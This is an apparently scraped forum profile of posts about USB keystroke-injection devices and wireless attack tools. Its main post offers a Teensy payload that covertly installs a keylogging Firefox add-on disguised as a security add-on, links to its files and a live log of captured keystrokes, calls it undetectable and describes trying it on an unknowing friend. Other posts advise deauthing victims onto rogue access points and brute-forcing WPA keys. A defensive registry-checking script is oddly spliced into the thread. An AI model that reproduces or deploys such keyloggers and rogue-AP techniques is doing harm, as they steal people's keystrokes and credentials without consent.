sandred
Posts: 20
Posts posted by sandred
-
Does anyone have the source code for this? The link is no longer working.
I have put them back. Let me know if you have a problem.
-
Ok, so I understand how things work now and I got things running for the most part... but for some reason it isn't working. It doesn't look like it adds anything new into the Mozilla portion of the registry and I don't see any new plugins/addons in Firefox. I've tried on 3 different PCs and I'm kinda stuck right now... any thoughts?
If you have a folder C:\kl (maybe from previous runs), then you have to delete it before running it again. Try that, and try to plug it in with nothing else running on your computer; maybe your computer is slow at multitasking and missing some keystrokes.
-
All the code does is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to Firefox "Hey, there is a plugin that you need to load at C:\kl", and when Firefox starts it loads the code. Once loaded, the plugin watches all the keystrokes made into the browser and quietly posts them to the remote server. The PHP script is placed on the server, which then takes these keys sent and stores them to a file.
You do not need to load these files into the Teensy. All you need to do is compile the code in Arduino and flash the Teensy with it. When you plug in the Teensy, it just echoes the code to the files and does the rest of that stuff. You can just try it as it is without changing anything. You can always uninstall it after testing.
Yes, the keylogger is very simple and very effective and completely undetectable, as it is effectively just 2 lines of JavaScript running inside a browser. I already field tested it on one of my friends' computers and he does not think anything ever happened at all when the Teensy installed it. I had to explain the details to him and even after that he does not really believe that's possible. Well, educate the masses I guess.
-
By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for Firefox. When the Teensy is inserted into USB, it uploads the plugin files into the C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into Firefox by adding a registry key into HKCU\Software\Mozilla\Firefox\Extensions. If Firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin (displayed as "Firefox Security Addon") loads when Firefox starts the next time. If everything goes fine, it will be done in 10 seconds.
The keystrokes are then sent to the remote server (specified in the code). The remote server then captures the keystrokes, time stamps and IP stamps (Bonus! we get the IP too) the data and logs it.
Please keep in mind that this is by no means polished or optimized code; bugs will exist. So watch out. I quickly copy-pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this cannot be implemented in a more sophisticated way for other plugin-supported browsers and for all OSes. I would love to see somebody optimize it.
Download the code from here:
http://karmetasploit.com/KL/AllFiles.zip
If you do not bother to change the server or just want to test it, then the logs are currently stored in this location:
http://karmetasploit.com/KL/logger.txt
Some plus points with this kind of keylogger:
- It works behind whatever firewalls as long as Firefox gets the internet.
- 100% AV undetectable
- You can decide to log or not to log based on IP.
Why bother stealing cookies when you can get all the key strokes. :)
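The persistence mechanism described in the post above is a value under the Firefox Extensions registry keys pointing at a directory on disk. The script below is an added example for checking a machine for such entries; it is not part of the thread or the posted code, and the list of "trusted" install roots is an assumption you should adjust for your environment.

```powershell
# Added example (not from the thread): list the Firefox extension registry
# entries and flag any whose install path is outside the usual locations.
# HKCU needs no admin rights; HKLM may need elevation to read fully.
$keys = @(
    'HKCU:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\WOW6432Node\Mozilla\Firefox\Extensions'
)
# Assumed trusted roots; enterprise deployments may use others.
$trustedRoots = @(
    "$env:ProgramFiles\",
    "${env:ProgramFiles(x86)}\",
    "$env:APPDATA\Mozilla\"
)
foreach ($key in $keys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-ItemProperty -Path $key
    # Each value name is an extension ID; each value data is a folder or .xpi path.
    foreach ($prop in $item.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }   # skip provider metadata properties
        $path = [string]$prop.Value
        $inTrusted = $false
        foreach ($root in $trustedRoots) {
            if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $inTrusted = $true
            }
        }
        [pscustomobject]@{
            Hive   = $key
            ExtId  = $prop.Name
            Path   = $path
            Exists = (Test-Path -LiteralPath $path)
            Status = if ($inTrusted) { 'ok' } else { 'REVIEW' }
        }
    }
}
```

A hit under a trusted root is normal for centrally deployed add-ons; the signal to act on is an extension ID whose path is an unusual location such as a bare folder under the drive root, like the C:\kl folder the post describes.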
-
I was trying to get a feel for system delays and general programming flow when using the Teensy. So I thought I would just do this for the heck of it, and when I did it... why not share it. It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems.
A few things learned while doing this:
- Delays are so damn important and they vary from system to system. Almost need to think of the slowest machines. That brings me to my second point.
- Feedback from the system is critical; we need to figure out how to get some feedback from the system.
/*
 .prints the obfuscated ascii heart
 .gets the heart into recognizable shape
 .says I love you
 .beats the heart <-- this may not work on slower machines
 ***Close all script/text/other programs with text input before running this.
 This program can be highly destructive if notepad is not launched for some reason.
 Use it at your own risk.***
*/
#include <string.h>

int ledPin = 11;
int i,j,k;
int nBeats = 5;   // no of beats
int fHigh = 14;   // max font size
int fLow = 6;     // min font size
int nSpaces = 20; // times to move the art to the right
int cn[] = {0,0,0,0,0}; // to store count of each char in the set to be replaced back
const char *rc[] = {"_"," ","I","Love","You"}; // replaced char set in original ascii art
const char *rw[] = {"66","99","1","4","3"};    // replaced with this char set to obfuscate it
const char *line[] = {
  "999999999999999999#991994999999999999999999999999#99199499",
  "999999999999#991994993..99999999999999#991994993...#",
  "99999999#991994993...#99199999999#991994993...#99199",
  "999999#991994993...#991994993...#9966666666666666#99199",
  "9999#991994993...#991994993...#99666666666666666666#99199",
  "99#991994993...#991994993...#99199Lo66666666666666#99199",
  "99#991994993...#991994993...#99199499Y666666666666#",
  "#991994993...#991994993...#991994993..6666#991",
  "#991994993...#991994993...#991994993...#9966#",
  "#991994993...#991994993...#991994993...#99199",
  "#991994993...#991994993...#991994993...#99199",
  "99#991994993...#991994993...#991994993...#99",
  "9999#991994993...#991994993...#991994993...",
  "99999999#991994993...#991994993...#991994993",
  "999999999999#991994993...#991994993...#99199Lov",
  "999999999999999999#991994993...#991994993...#",
  "999999999999999999999999#991994993...#99199499Y",
  "9999999999999999999999999999#991994993...#99199L",
  "9999999999999999999999999999999999#991994993.",
  "99999999999999999999999999999999999999#99199499",
  "999999999999999999999999999999999999999999#99199Lo",
  "99999999999999999999999999999999999999999999#99199",
  "9999999999999999999999999999999999999999999999#99"
}; // ascii art to be printed

void setup(){
  pinMode(ledPin, OUTPUT); // set led
  delay(2000);             // not needed
}

void loop () {
  delay(2000);                // wait until hid is detected
  digitalWrite(ledPin, HIGH); // turn led on
  WriteMessage();             // main function
  KeyCombo(MODIFIERKEY_CTRL,KEY_END); // just in case the font change function fails, this will not destroy the printed ascii
  KeyPress(KEY_ENTER);
  delay(2000); // let them watch it for a couple of seconds
  for(j=1;j<=nBeats;j++){ // make heart beat by changing font size
    Beat(); // this will not work on slower machines.
  }
  ChFont(10);                // set back the font size to default 10
  digitalWrite(ledPin, LOW); // turn led off, we are done
  delay(50000);              // delays the loop
}

void WriteMessage(){
  runcmd("notepad.exe"); // open notepad from the run dialog
  delay(2000);           // wait until notepad is open
  sysMenu(KEY_X);        // maximize notepad
  delay(1000);           // wait until the command is finished
  ChFont(10);            // set the font size to default 10
  for(i=0;i<sizeof(line)/sizeof(line[0]);i++){ // loop through all lines of art
    for(j=0;line[i][j] != '\0';j++){
      if(line[i][j] == rw[0][0]){cn[0]++;} // count each char to be replaced
      if(line[i][j] == rw[1][0]){cn[1]++;}
      if(line[i][j] == rw[2][0]){cn[2]++;}
      if(line[i][j] == rw[3][0]){cn[3]++;}
      if(line[i][j] == rw[4][0]){cn[4]++;}
      Keyboard.print(line[i][j]); // print each char letter by letter
      delay(20);                  // this produces something to stare at on screen
    }
    KeyPress(KEY_ENTER); // new line
  }
  for(i=0; i<nSpaces; i++){ // move the whole art to the right, more like to the center of notepad
    KeyCombo(MODIFIERKEY_CTRL,KEY_HOME);
    for(j=0;j<sizeof(line)/sizeof(line[0]);j++){ // move one line at a time and loop through all.
      KeyPress(KEY_SPACE);
      //delay(50);
      KeyPress(KEY_DOWN);
      KeyPress(KEY_HOME);
    }
  }
  for(i=0;i<sizeof(rw)/sizeof(rw[0]);i++){ // replace char one by one
    KeyCombo(MODIFIERKEY_CTRL,KEY_HOME);
    KeyCombo(MODIFIERKEY_CTRL,KEY_H);
    delay(300);
    sysMenu(KEY_M);
    delay(300);          // these are important delays
    ClicknMove(-127,127); // moves replace dialog to bottom left and takes it out of the way
    delay(300);          // these are important delays to make click work
    switch(i){ // replace accordingly
      case 0:
        Keyboard.print(rw[0]);
        KeyPress(KEY_TAB);
        Keyboard.print(rc[0]);
        for(j=1;j < cn[0]/2 -5;j++){ // replace char by char but go a few less
          KeyCombo(MODIFIERKEY_ALT,KEY_R);
          delay(100); // delay to stare at the action
        }
        break;
      case 1:
        Keyboard.print(rw[1]);
        KeyPress(KEY_TAB);
        Keyboard.print(rc[1]);
        for(j=1;j < (cn[1]/2 -5);j++){
          KeyCombo(MODIFIERKEY_ALT,KEY_R);
          delay(30);
        }
        break;
      case 2:
        Keyboard.print(rw[2]);
        KeyPress(KEY_TAB);
        Keyboard.print(rc[2]);
        for(j=1;j < cn[2] -5;j++){
          KeyCombo(MODIFIERKEY_ALT,KEY_R);
          delay(70);
        }
        break;
      case 3:
        Keyboard.print(rw[3]);
        KeyPress(KEY_TAB);
        Keyboard.print(rc[3]);
        for(j=1;j < (cn[3] -5);j++){
          KeyCombo(MODIFIERKEY_ALT,KEY_R);
          delay(70);
        }
        break;
      case 4:
        Keyboard.print(rw[4]);
        KeyPress(KEY_TAB);
        Keyboard.print(rc[4]);
        for(j=1;j < (cn[4] -5);j++){
          KeyCombo(MODIFIERKEY_ALT,KEY_R);
          delay(70);
        }
        break;
    }
    KeyCombo(MODIFIERKEY_ALT, KEY_A); // replace remaining few with replace all
    delay(30);      // important for the above command to be finished.
    sysMenu(KEY_C); // close replace box.
  }
}

void Beat(){
  for(i=fLow;i<=fHigh;i++){ // increase font one size at a time
    ChFont(i);
    delay(20);
  }
  for(k=fHigh;k>=fLow;--k){ // decrease font one size at a time
    ChFont(k);
    delay(20);
  }
}

void runcmd(const char *cmd){
  KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog
  delay(1500);                     // wait for it to open
  Keyboard.print(cmd);             // enter some command
  KeyPress(KEY_ENTER);             // exec some command
}

void KeyPress(int SomeKey) {
  Keyboard.set_key1(SomeKey); // set some key
  Keyboard.send_now();        // "press" some key
  // clear some key
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void KeyCombo(int ModKey,int SomeKey) {
  Keyboard.set_modifier(ModKey); // set one or more modifier keys
  Keyboard.set_key1(SomeKey);    // set regular key
  Keyboard.send_now();           // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0);     // have to do this to keep it from hitting the key multiple times.
  Keyboard.send_now();
}

void sysMenu(int SomeKey) {
  Keyboard.set_modifier(MODIFIERKEY_ALT); // set one or more modifier keys
  Keyboard.set_key1(KEY_SPACE);           // set regular key
  Keyboard.send_now();                    // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0);     // have to do this to keep it from hitting the key multiple times.
  Keyboard.send_now();
  delay(10);
  Keyboard.set_key1(SomeKey);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void ClicknMove(int x, int y){
  Mouse.set_buttons(1,0,0); // hold left button
  Mouse.move(x, y);         // drag
  Mouse.set_buttons(0,0,0); // release
}

void ChFont(int sz){
  KeyCombo(MODIFIERKEY_ALT,KEY_O);
  delay(50);          // magic number that works on my machine
  KeyPress(KEY_F);    // open font window
  delay(50);
  KeyPress(KEY_TAB);  // go to font size
  KeyPress(KEY_TAB);  // go to font size
  Keyboard.print(sz); // give new size
  KeyPress(KEY_ENTER);
}
-
Try DNS tunneling with heyoka. It theoretically should work with existing open ports and give you RDP or SSH, whichever is listening on your master.
-
There was a very interesting talk at Shmoocon 2010 about GSM MITM using USRP and OpenBTS. The only downside of it is the cost.
I came across this today and you might already be aware of it from AT&T: http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with, but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm, sounds challenging and interesting. Any of you looked into it? Maybe we can use this instead of the costly USRP module for GSM MITM?
-
Hey, thanks for the quick replies... I'm still having some problems.
I followed the link http://karmetasploit.com/archives/55
My dhcp and the network files are exactly the same as the examples in the link.
Before doing anything I used this line to enable the wicd manager. Then I launched the wicd GUI, entered my AP's WPA2 key and was able to go online just fine.
/etc/init.d/wicd start
Back to the original problem: it seems that I'm unable to maintain both wlan0 and eth0 at the same time. I can only connect to one of them at a time.
Should I set my wlan0 (wireless) to master mode or something? Or am I doing something wrong still?
Do not use wicd or wicd-client. If I remember it correctly, wicd disconnects you from either one of them as soon as you connect to the other. So if you want to test it and still want to use wicd, connect to the internet as you normally do using wicd, then right click on the wicd client icon and completely exit it. Then test if you are still connected to the internet. After that bring eth0 up using the above commands and you should be fine. I believe if you don't exit wicd before bringing eth0 up it will disconnect you from wlan0. I think, but I am not sure. Try it.
-
Here .. This might help you. Post back here if you have any problems as I definitely got that working.
-
Sorry guys, I forgot.... I will try to upload it to rapidshare or somewhere like that.
I had a copy of it. I hope it is alpha 4. Here is the link.
-
I am new to this USB thing... so please bear with me.
So here are nice tools developed by DB. I downloaded them, made an ISO containing all the tools, including an autorun.inf to launch them all. The thing that I don't understand is that they are all on a "CD-ROM" drive that can't write data (aka dump). So launching them is useless if they can't dump. How do you launch them from a writable portion of the jump drive?
The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could someone please get me started on "launching files"?
-
Then how can it do both things at the same time? You can only multitask (time share) I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.
I'd agree with that but I'm going to put them both on the same because people are asking for it. There will be appropriate warnings.
-
Best bet to get the most out of mdk3 and jasager is to run them on separate Fons. Run legend/mdk3/aircrack on one Fon; use it to deauth your target client or AP. That forces your victims to connect to jasager running on the second Fon automatically. It totally works.
Just installed "libpthread_0.9.28-8_mips.ipk". Now it works like a charm ;)
<3 <3 <3
-
Thanks! I was under the impression that it did not require new installs. Now I got it.
-
Yea, I knew it would be pretty slow, but I just wanted to test a 100 word dict file. Anyways, I got it running on Windows. Thanks
-
When I tried to upgrade... I got this error:
root@OpenWrt:~# ipkg install jasager_2.1.ipk
Upgrading jasager on root from 1 to 2...
Nothing to be done
An error ocurred, return value: 1.
Collected errors:
ERROR: Cannot satisfy the following dependencies for jasager:
ruby-core ruby-rexml
What should I do?
-
I want to run John on the FON for brute forcing WPA (pipe it to aircrack). I currently don't have a Linux installation to "make" the file from source. Is there a quick way to get john running on the FON? Any ideas or help is appreciated.
-
Thank you!
-
I am trying to package the new version of MDK3 V5 into an ipk file but with no luck. Could you please explain the process in depth or upload the ipk file somewhere?
Thanks
I figured out how the Piranha firmware built the mdk3 package today and I was able to compile my own package :D . mdk3 does kind of work alongside karma but there are some minor issues. For example, when I tried setting up jasager on channel 6 and set mdk to channel hop it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it yourself and maybe someone will be kind and upload the package for the people that don't know how to build it.
include $(TOPDIR)/rules.mk

PKG_NAME:=mdk3
PKG_REV:=5
PKG_VERSION:=v$(PKG_REV)
PKG_RELEASE:=1

PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2
PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION)
PKG_SOURCE_VERSION:=$(PKG_REV)
#PKG_SOURCE_PROTO:=svn

include $(INCLUDE_DIR)/package.mk

define Package/mdk3
	SECTION:=net
	CATEGORY:=Network
	TITLE:=MDK3
	URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
	SUBMENU:=wireless
endef

define Package/mdk3/description
	Tool to exploit wireless vulnerabilities
endef

define Build/Configure
endef

define Package/mdk3/install
	$(INSTALL_DIR) $(1)/usr/sbin
	$(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/
endef

$(eval $(call BuildPackage,mdk3))
[Version 1] White Hat Examples? (in Classic USB Rubber Ducky)
Tried this?
http://www.hak5.org/forums/index.php?showtopic=16469